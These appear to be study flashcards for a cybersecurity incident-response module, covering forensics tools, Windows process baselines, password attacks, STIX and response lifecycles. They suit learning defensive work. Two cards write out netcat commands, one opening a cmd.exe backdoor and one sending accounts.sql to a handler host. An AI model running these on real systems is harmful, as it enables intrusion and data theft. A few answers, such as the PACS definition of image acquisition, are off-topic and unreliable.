Module 4: Cyber Incident Response
What are the locations used to store passwords?
%SystemRoot%\System32\config\SAM - local users and passwords (Security Account Manager) are stored as part of the registry on Windows machines. %SystemRoot%\NTDS\NTDS.DIT - domain users and passwords are stored in the Active Directory database on domain controllers. Linux: passwords are moved to /etc/shadow, which is only readable by the root user. Browsers often store cached passwords, either in the Windows registry or in a file or database.
What is a horizontal brute force attack?
(also called password spraying). This means that the attacker chooses one or more common passwords ("password" or "123456" for instance) and tries them in conjunction with multiple usernames.
What are the various factors that can affect incident severity and prioritisation?
- Data integrity - Downtime - Economic - Scope - Detection time - Recovery time
Detecting malicious processes 2
- Examine processes hosted by service host executables (svchost.exe) and other Windows utilities (explorer.exe, notepad.exe, taskmgr.exe, iexplore.exe, and so on). Look closely at processes that do not have a valid parent / child relationship with the principal Windows processes. - Look for processes that have used packing (compression). Packed code might have been obfuscated or encrypted. These are highlighted in purple in Process Explorer. - Also identify how the process interacts with the network - which ports is it using? What domains or IP subnets is it contacting?
Detecting malicious processes 1
- Look for unrecognized process names, especially names that mimic a legitimate system process (scvhost for instance) or randomly-generated names. - Look for processes with no icon, version information, description, or company name. - Look for processes that are unsigned (especially a process with a company name like "Microsoft Corporation" that is also unsigned).
What are some common investigation techniques?
- Viewing logs - OS and process analysis - Analysing prefetch files -- record the names of applications that have been run plus a wealth of other information (date and time, file path, run count, and DLLs used by the executable).
What is the file format used by EnCase to image a file?
.e01 The .eo1 format allows image metadata (such as the checksum, drive geometry, and acquisition time) to be stored within the same file; if the raw format is used a separate metadata case file will be created.
What are the three methods to manage acquisition of data?
1. Live acquisition -- When performing live acquisition, isolate the host from the network by redirecting its switch port to a blackhole VLAN. 2. Shut down the computer runs the risk that the malware will detect the shut down process and try to remove traces of itself from volatile storage. 3. Pull the plug - switch off power to the computer suddenly. This is most likely to preserve the devices in a forensically clean state but there is the risk of corrupting data.
What are the two principal evidence-collection questions?
1. What evidence must be collected? 2. How should the evidence be collected?
What is the magic number for a binary file?
4d 5a
What can be useful when identifying anomalies?
A configuration baseline.
What is a dropper?
A dropper is a small bit of code used to gain initial access to the system. For an attacker, obtaining sufficient permissions to execute the dropper code is usually the tricky bit. This type of file / threat signature should be detected by host IDS. The attacker will try to obfuscate the code and entry points used to launch the dropper to evade anti-malware detection.
What is a hybrid attack?
A hybrid password attack uses a combination of dictionary and brute force attacks. It is principally targeted against "naively strong" passwords, such as james1.
What is a playbook or runbook?
A playbook (or runbook) is a data-driven SOP to assist junior analysts in detecting and responding to quite specific cyber threat scenarios (phishing attempt, .RAR file data exfiltration, connection to a blacklisted IP range, and so on). The playbook starts with an SIEM report and query designed to detect the incident and identifies the key detection, containment, and eradication steps to take.
What is registry viewer?
A registry viewer can extract the Windows registry files from an image and display them on the analysis workstation, regardless of the OS. Examining the registry is important for discovering what changes malicious tools might have made to the system configuration (perhaps validating against an authorized template), discovering suspicious autostart locations and items, examining deleted keys, and so on.
OODA Loop: Act
Act - remediate the situation quickly and decisively. Then start the loop again until the incident is fully resolved: Observe, Orient, Decide, Act.
What is ADS?
Alternate data streams feature of NTFS. Can be detected using ADS Spy.
What is the purpose of an incident form?
An incident form records the detail about the reporting of an incident and assigns it a case or job number.
Network symptoms: unusual traffic spikes
An unexpected surge in traffic from Internet hosts could be a sign of an ongoing DDoS attack. DDoS attacks are very hard to counter because of the difficulty in identifying which connection attempts are legitimate and which are malicious. The key to repelling a sustained attack will lie in real-time analysis of log files to identify the pattern of suspicious traffic and redirecting that to a blackhole or sinkhole. Other approaches are to aggressively close slow connections by reducing timeouts on the affected server and make use of caching and back-end infrastructure to offload processing to other servers.
What are typical application-specific symptoms?
Anomalous activity Unexpected outbound comms (check for bad IPs) Introduction of new accounts Service interruption Memory (buffer) overflow (process consumes bytes without releasing them again) Unexpected output
What tool can be used in Sysinternals to detect startup services and locations?
Autoruns
Network symptoms: Beaconing
Beaconing refers to attempts by malware to "phone home" and contact a remote Command & Control (C2) host or network. Beacon activity is detected by capturing metadata about all the sessions established or attempted and analyzing it for patterns that constitute suspicious activity.
What is the order of volatility?
CPU registers/cache memory Routing table, ARP cache, process table, kernel stats Memory (RAM) Temporary file systems / swap space / virtual memory. Disk - including file system and free space. Remote logging and monitoring data. Physical configuration and network topology. Archival media.
Additional point about CSRSS and WININIT
CSRSS and WININIT are run by other instances of SMSS, which terminate after loading the child process.
What are some password cracking tools?
Cain and Abel John the Ripper THC Hydra Aircrack-ng L0phtcrack
STIX 'Campaign and threat actor'
Campaign and Threat Actor - the adversaries launching cyber-attacks are referred to in this framework as Threat Actors. The actions of Threat Actors utilizing multiple TTPs against the same target or the same TTP against multiple targets may be characterized as a campaign.
What is Cellebrite?
Cellebrite is a company focused on evidence extraction from smartphones and other mobile devices, including older feature phones, and from cloud data and metadata. The company supply Universal Forensic Extraction Devices (UFED) for use in the field.
Client Server Runtime SubSystem (csrss.exe)
Client Server Runtime SubSystem (csrss.exe) - manages low-level Windows functions. It is normal for there to be several running (so long as launched from %SystemRoot%\System32) and for them to have no parent.
STIX 'course of action'
Course of Action (CoA) - mitigating actions or use of security controls to reduce risk from Exploit Targets or to resolve an incident.
What can cryptography analysis do?
Cryptography analysis tools can be used to determine the type of encryption algorithm used and assess the strength of the encryption key (password complexity). On a live system, it might be possible to recover the decryption key from system memory.
OODA Loop: Decide
Decide - what are the options for countermeasures? What are our goals? Can we prevent a data breach from happening or should we focus on gathering forensic evidence to try to prosecute later?
What are the defensive capabilities?
Detect Destroy Degrade Disrupt Deny Deceive
What is EnCase?
EnCase Forensic is a digital forensics case management product created by Guidance Software. Case management is assisted by built-in pathways, or workflow templates, showing the key steps in different types investigation.
STIX 'exploit target'
Exploit Target - system vulnerabilities or weaknesses deriving from software faults or configuration errors.
Explorer (explorer.exe)
Explorer (explorer.exe) - this is the typical user shell (launched with the user's account privileges rather than SYSTEM's) and is likely to be the parent for processes started by the logged on user.
What is the list of file and file system viewers?
File carving tools Crypto tools Registry viewer User account viewer - A user account analysis tool will report on the details of the local user accounts. USB viewer - USB utility can report on devices that have been attached to the system Application viewer -- There are various analysis tools targeted at particular types of application, such as retrieving browser history and cookies, examining contact databases, analyzing email mailboxes, or extracting IM or VoIP call histories.
What does a file carver do?
File carving tools allow recovery of information from sectors where the file metadata has been deleted.
What are the typical channels for data exfiltration?
HTTP or HTTPS Other overt channels, such as FTP, IM, P2P, email, and so on Explicit tunnels such as SSH or VPNs Steganography File copy to USB, external hard drive, or other media
What is Helix?
Helix from e-fense is a Linux-based Live CD designed to be mountable on a host computer without affecting the data on the host computer. The Live CD can then be used to perform evidence acquisition, such as drive imaging.
Why is incident response so difficult?
However, incident response is also one of the most difficult areas of security to plan for and implement because its aims are often incompatible: - Re-establish a secure working system. - Preserve evidence of the incident with the aim of prosecuting the perpetrators. - Prevent reoccurrence of the incident.
What is Pass-the-Hash?
If an attacker can obtain the hash of a user password, it is possible to present the hash (without cracking it) to authenticate to network protocols such as CIFS and Kerberos. Such attacks are called Passthe-Hash (PtH).
STIX 'incident'
Incident - a pattern of indicators forming a discrete cybersecurity event. The incident is defined both by the indicators involved and the assets affected. The incident will be assigned a ticket and priority and the parties involved in response and incident handling will be identified.
STIX 'indicator'
Indicator - a pattern of observables that are "of interest"; or worthy of cybersecurity analysis. Ideally software would automate the discovery of connections between observables, based on a knowledge of past incidents and TTPs (see below).
What should evidence bags have?
It is also appropriate to ensure that the bags have anti-static shielding to reduce the possibility that data will be damaged or corrupted on the electronic media by ElectroStatic Discharge (ESD).
System Idle Process
Kernel level binary. Will generate CPU and network traffic.
System Process
Kernel-level binary. Will generate CPU and network traffic. System is the parent for Interrupts and the Windows Session Manager SubSystem (smss.exe). SMSS is the first user-mode process and should only appear as a child of System and launch from %SystemRoot%\System32.
Local Security Authority SubSystem (lsass.exe)
Local Security Authority SubSystem (lsass.exe) - this handles authentication and authorization. There should only be a single instance, running as a child of wininit.exe.
What are typical file types associated with data staging areas used by a baddie to collect into?
Look for file archive, compression, and encryption types such as RAR or gzip that are atypical of normal end user file creation. An adversary is likely to use archives split over a number of files rather than one big file. Also look for files in system folders, such as the root of the Recycle Bin or System Volume Information.
What can you use to see whether a system policy deviates from a configuration baseline?
MS Baseline Security Analyser.
Why should you boot analysis tools from a separate OS rather than running them from within the host?
Many types of malware are able to identify process analysis tools and shut down when they detect them being launched or try to prevent the tool from being launched in the first place (though the latter approach reveals the presence of malware pretty decisively).
What are some common methods of performing code injection?
Masquerading - the launcher replaces a genuine executable with a malicious one. DLL injection - the launcher forces the process to load a DLL, which can then execute malicious code. DLL sideloading - the launcher exploits a vulnerability in a legitimate program's manifest to load a malicious DLL at runtime. Process hollowing - the launcher starts a process in a suspended state and rewrites the memory locations containing the process code with the malware code.
What are two tools to obtain volatile storage data?
Memoryz F-Response TACTICAL
What is the NIST definition of an 'incident'?
NIST describe an incident as "the act of violating an explicit or implied security policy".
STIX 'observable'
Observable - a stateful property of the computer system or network or an event occurring within it. Examples of observables include a change in an executable file property or signature, an HTTP request, or a firewall blocking a connection attempt. Observables would be generated by the logging and monitoring system (the data "bucket").
OODA Loop: Observe
Observe - you need information about the network and the specific incident and a means of filtering and selecting the appropriate data.
OODA Loop
Observe, Orient, Decide, Act
OODA Loop: Orient
Orient - what is the state of play? Is the attack just beginning or has the network been compromised for some time? What are the resources and goals of the adversary?
What defines the safe handling of payment card information?
Payment Card Industry Data Security Standard (PCI DSS).
What is cryptcat?
Performs a similar function netcat but ability to encrypt channel
What does the NIST Computer Security Incident Handling Guide identify as the stages of an incident response lifecycle?
Preparation - making the system resilient to attack in the first place. This includes hardening systems, writing policies and procedures, and establishing confidential lines of communication. It also implies creating incident response resources and procedures. Detection and Analysis - determining whether an incident has taken place and assessing how severe it might be, followed by notification of the incident to stakeholders. This phase is also referred to as "Identification" in other models. Containment, Eradication, and Recovery - limiting the scope and magnitude of the incident. The typical response is to "pull the plug" on the affected system, but this is not always appropriate. Once the incident is contained, the cause can then be removed and the system brought back to a secure state. Post-incident Activity - analyzing the incident and responses to identify whether procedures or systems could be improved. It is imperative to document the incident. This phase is very commonly referred to as "Lessons Learned".
What are some of the relevant factors in containment?
Prevent ongoing intrusion or data breach. This is likely to be the overriding priority. Identify whether the intrusion is the primary attack or a secondary one (part of a more complex campaign). Avoid alerting the attacker to the fact that the intrusion has been discovered. Preserve forensic evidence of the intrusion.
Process Explorer
Process Explorer is an enhanced version of Task Manager. You can view extra information about each process and understand how processes are created in parent / child relationships better. Right-click the column headers to view more or fewer fields.
What tool can be used in Sysinternals to track how a process interacts the the file system and registry?
Process Monitor
Process monitor
Process Monitor shows the events generated by Windows processes as they interact with the file system, registry, and network pipes.
What are three signs of suspicious resource consumption?
Processor usage Memory consumption (especially per-process use of memory) Drive capacity -- malware might be caching files locally for exfiltration over the network or USB.
What are the several types of data typically targeted?
Protected Health Information (PHI) Personally identifiable information (PII) Payment card information Intellectual property Corporate data
RAT
Remote Access Trojan e.g. BackOrifice, SubSeven, Poison Ivy, NJRat, XTremeRAT, KIlerRAT, Blackshades, Dark Comet.
What does removal involve?
Removal - a simple option is to disconnect the host from the network completely, either by pulling the network plug or disabling its switch port. This is the least stealthy option.
How do you identify the process of buffer overflow?
Run code in a sandboxed debugging environment
Network symptoms: rogue devices 2
Servers -- An adversary may also try to set up a server as a malicious honeypot to harvest network credentials or other data. This risk can be particularly high in a virtualized environment. Workstations / mobile devices -- End-user devices might introduce malware, perform network reconnaissance, or be used for data exfiltration. As well as digital data, you also have to consider the risk of recording from cameras and microphones. Smart appliances -- Devices such as printers, webcams, and VoIP handsets have all suffered from exploitable vulnerabilities in their firmware. If use of these assets is not tracked and monitored they could represent a potential vector for an adversary.
Services process
Services - hosts non-boot drivers and background services. There should only be one instance of services.exe, running as a child of wininit.exe. Services either appear as child processes of services.exe or child process of svchost.exe wrappers (which should always load from %SystemRoot%\System32).
Configure netcat as a backdoor
Set up listener on victim system: nc -l -p 666 -e cmd.exe Set up client on host system: nc 10.1.0.1 666
What are three examples of incident investigation software?
Sysinternals Windows Forensic Toolchest Redline
STIX 'TTP'
Tactics, Techniques, and Procedures (TTP) - known adversary behaviors, starting with the overall goal and asset target (tactic) and elaborated over specific techniques and procedures. This information is used to identify potential indicators and incidents.
What helps to look up startup items?
The Autoruns tool in Sysinternals
What is FTK?
The Forensic Toolkit (FTK) from AccessData is another commercial investigation suite designed to run on Windows Server (or server cluster).
What is the OODA Loop intended to achieve?
The OODA loop is designed to stop you from reacting to what your adversary is doing and take the initiative with a measured response. The model is described as a loop because there is constant re-evaluation of the situation as facts change or become known.
What is Sleuth Kit?
The Sleuth Kit (sleuthkit.org) is an open source collection of command line tools and programming libraries for disk imaging and file analysis. Autopsy is a graphical frontend for these tools and also provides a case management / workflow tool.
What is a key incident response communication consideration?
The team require an "out-of-band" or "off-band" communication method that cannot be intercepted. Using corporate email or VoIP runs the risk that the adversary will be able to intercept communications. One obvious method is cellphones but these only support voice and text messaging. For file and data exchange, there should be a messaging system with end-to-end encryption such as Off-the-Record (OTR), Signal, or WhatsApp or an external email system with message encryption (S/MIME or PGP).
What is one way to discover a malware process through indirect means?
Through network communication. If you can trust netstat on the local host (better perhaps to monitor remotely) then look for evidence of the infected PID(s) communicating on the network to its handler. You can pipe the output from netstat to the findstr command to filter the results. For example, the following command searches for connections opened by PID 112120 on the 10.1.0.0 subnet:
How can pass the hash attacks be thwarted?
To defend against pass-the-hash attacks, domain admin accounts should only ever be used to log on to domain controllers. Administrative control of member servers and workstations should be performed by accounts with only the sufficient permissions required. Microsoft have also introduced a Restricted Admin mode for Windows 8 / Server 2012 up, which disables passing credentials to the remote server when accessing it over RDP.
What is a write-blocker?
To obtain a forensically sound image from non-volatile storage, you need to ensure that nothing you do alters data or metadata (properties) on the source disk or file system. A write blocker assures this process by preventing any data on the disk or volume from being changed by filtering write commands at the driver and OS level.
Which operating systems use salt?
UNIX and Linux, not Windows.
USERINIT (userinit.exe)
USERINIT (userinit.exe) - sets up the shell (typically explorer.exe) and then quits. You should only see this process briefly after logon.
WININIT (wininit.exe)
WININIT (wininit.exe) - manages drivers and services. There should only be one instance of WININIT.
WINLOGON (winlogon.exe)
WINLOGON (winlogon.exe) - manages access to the user desktop. There will be one instance for each user session. The Desktop Window Manager (dwm.exe) is likely to be a child process in modern versions of Windows.
What is STIX?
When classifying threats and understanding adversary behaviors, it is helpful to consider the framework developed by MITRE in their Structured Threat Information eXpression (STIX) white paper to facilitate sharing of threat intelligence.
Network symptoms:irregular peer to peer comms
When you see workstation endpoints establishing sessions with one another or with Internet hosts, there may be cause for suspicion, especially if the traffic flows include high bandwidth consumption or occur at odd times of the day.
Can Sysinternals be used for forensic analysis?
Yes.
What is the use of Sysinternals?
You can use the Sysinternals suite to try to discover signs of malware infection. To use the tools effectively, you have to build up a sense of what is "normal" in a system and spot deviations in a potentially infected system.
What is an Advanced Persistent Threat?
an APT refers to the ongoing ability of an adversary to compromise network security (to obtain and maintain access), using a variety of tools and techniques. The concept of an APT is a means of modelling "known unknown" threats. As well as scanning for virus or Trojan signatures, you can scan for the presence of Command and Control software or network activity or look for unexplained changes in network activity overall.
During an incident, how should communications take place?
communication should take place across secure, out-of-band channels so that an adversary is not alerted.
What is the imaging command in Linux?
dd $ dd if=/dev/sda of=/mnt/usbstick/backup.img
Network symptoms: rogue devices 1
e.g Network taps -- A physical device might be attached to cabling to record packets passing over that segment. Network appliances -- Rogue wireless access points, switches, or routers could be used to and harvest authentication credentials and addressing information when the legitimate clients try to connect.
Use netcat to receive files
on target system: type accounts.sql | nc 10.1.0.249 6666 on handler: nc -l -p 6666 > accounts.sql
How can an attacker ID the right area in memory for a buffer overflow?
one of the problems the attacker faces is identifying the precise locations in memory of the return address and the address of the arbitrary code (often shellcode; a command in the machine's command shell). One of the means of doing this is a "NOP sled", so that the attacker maximizes the chances of hitting the return address by padding the input with lots of "do nothing, move to the next memory location" instructions.
How can restricting logons create a Dos?
restricting logons can be turned into a vulnerability as it exposes you to Denial of Service attacks. The attacker keeps trying to authenticate, locking out valid users.
What is an example of a standalone image acquisition appliance?
the CRU Ditto Forensic Field Station
What is image acquisition?
the process of digital data acquisition for input into a PACS system
What are the recommended specs for a digital forensics workstation?
they are recommended to be installed on enterprise-class servers or workstations (16+ CPU cores and 32 - 96 GB RAM for instance) or on a distributed computing platform.
